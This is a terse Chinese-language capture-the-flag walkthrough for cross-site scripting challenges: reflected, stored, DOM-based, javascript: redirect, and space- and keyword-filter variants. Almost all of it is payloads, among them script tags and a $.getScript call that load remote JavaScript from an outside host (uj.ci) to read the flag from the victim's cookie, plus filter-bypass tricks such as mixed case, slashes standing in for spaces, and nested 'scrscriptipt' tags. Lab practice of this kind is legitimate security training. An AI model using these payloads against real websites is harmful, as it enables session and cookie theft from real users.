目录
反射型
查看是否存在弹窗
<script>alert(1)</script>
查看脚本
<sCRiPt sRC=//uj.ci/ijy></sCrIpT>
输入网页地址+脚本
查看cookie的flag
存储型
查看是否存在弹窗
查看脚本
<sCRiPt sRC=//uj.ci/ijy></sCrIpT>
输入脚本
查看cookie的flag
DOM反射
查看是否存在弹窗
</script><script>alert(1)</script>
查看脚本
</script><sCRiPt sRC=//uj.ci/ijy></sCrIpT>
查看cookie的flag
DOM跳转
检查是否存在弹窗,可以放在url地址栏上执行
?jumpto=javascript:alert(1)
放入脚本,使用$.getScript功能是异步加载并执行
?jumpto=javascript:$.getScript("//uj.ci/ijy")
查看cookie的flag
过滤空格
查看是否存在弹窗
<script>alert(1)</script>
有空格,用/代替 (/**/)
<sCRiPt/sRC=//uj.ci/ijy></sCrIpT>
查看cookie的flag
过滤关键词
测试是否弹窗
<scrscriptipt>alert(1)</scrscriptipt>
查看脚本
输入脚本
<sCRiPt sRC=//uj.ci/ijy></sCrIpT>
查看cookie的flag